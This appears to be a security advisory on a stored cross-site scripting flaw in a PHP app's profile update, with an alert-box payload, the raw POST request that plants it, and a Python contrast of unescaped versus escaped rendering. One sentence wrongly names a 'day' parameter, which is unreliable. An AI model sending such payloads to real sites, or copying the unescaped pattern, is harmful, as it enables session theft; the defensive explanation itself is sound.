The web application is vulnerable to stored cross-site scripting (XSS) in its update-profile functionality. An attacker can exploit this by injecting JavaScript into the "firstname" parameter, which is used when updating profile details. When unsuspecting users view another customer's first name, the injected script executes in their browsers, potentially enabling session hijacking or data theft.
To exploit the stored XSS vulnerability, an attacker crafts a payload containing malicious JavaScript and injects it into the "day" parameter while assigning a project. For example,
submitting the payload "><img src=x onerror=alert('xss-by-reynaldo')>
triggers an alert box when the stored value is viewed, demonstrating that arbitrary script executes within the application.
POST /classes/Master.php?f=update_account HTTP/1.1
Host: [REDACTED]
Content-Length: 178
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
Origin: [REDACTED]
Sec-Fetch-Site: same-origin
Referer: [REDACTED]
Cookie: PHPSESSID=[REDACTED]
Connection: close
id=2&firstname="><img+src=x+onerror=alert('xss-by-reynaldo')>&lastname=test&contact=123123123&gender=Male&default_delivery_address=test&email=test%40test.com&password=&cpassword=
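The request above works because the stored first name is written back into the page without output encoding; the leading "> closes the attribute and tag it sits in, so the rest is parsed as new markup. The following is an added example, not code from the advisory or from the affected application (which is PHP), written in Python to show the vulnerable rendering pattern next to the hardened one and a server-side allowlist check for the field. The template shape (an <input value="..."> field) and the name rules are assumptions for illustration; the payload string is the one the advisory shows.

```python
import html
import re

# Constructed sample: the same payload the advisory shows in the "firstname" field.
STORED_FIRSTNAME = '"><img src=x onerror=alert(\'xss-by-reynaldo\')>'


def render_profile_unsafe(firstname: str) -> str:
    """Vulnerable pattern (assumed template shape): the stored value is
    concatenated straight into an HTML attribute. A leading '">' closes the
    attribute and the tag, so whatever follows is parsed as new markup."""
    return f'<input type="text" name="firstname" value="{firstname}">'


def render_profile_safe(firstname: str) -> str:
    """Hardened pattern: HTML-encode for the attribute context before output.
    quote=True also escapes ' and ", which is what prevents attribute break-out.
    (In PHP the equivalent is htmlspecialchars($v, ENT_QUOTES, 'UTF-8').)"""
    return f'<input type="text" name="firstname" value="{html.escape(firstname, quote=True)}">'


# Assumed allowlist for a first name: letters, spaces, apostrophes, hyphens, max 50 chars.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' \-]{0,49}$")


def validate_firstname(firstname: str) -> bool:
    """Server-side input validation as defence in depth; it does not replace
    output encoding, because the same value may be rendered in other contexts."""
    return bool(NAME_RE.fullmatch(firstname))


def contains_injected_markup(rendered: str) -> bool:
    """Check used only to make the difference visible: does the rendered
    fragment contain any tag other than the expected <input>?"""
    tags = re.findall(r"<\s*([a-zA-Z]+)", rendered)
    return any(t.lower() != "input" for t in tags)


if __name__ == "__main__":
    print("unsafe:", render_profile_unsafe(STORED_FIRSTNAME))
    print("safe:  ", render_profile_safe(STORED_FIRSTNAME))
    print("payload passes validation:", validate_firstname(STORED_FIRSTNAME))
```

Run stand-alone, the unsafe rendering yields an <img> element with an onerror handler, while the safe rendering keeps the whole payload inside the value attribute as inert text; the allowlist additionally rejects the payload at submission time.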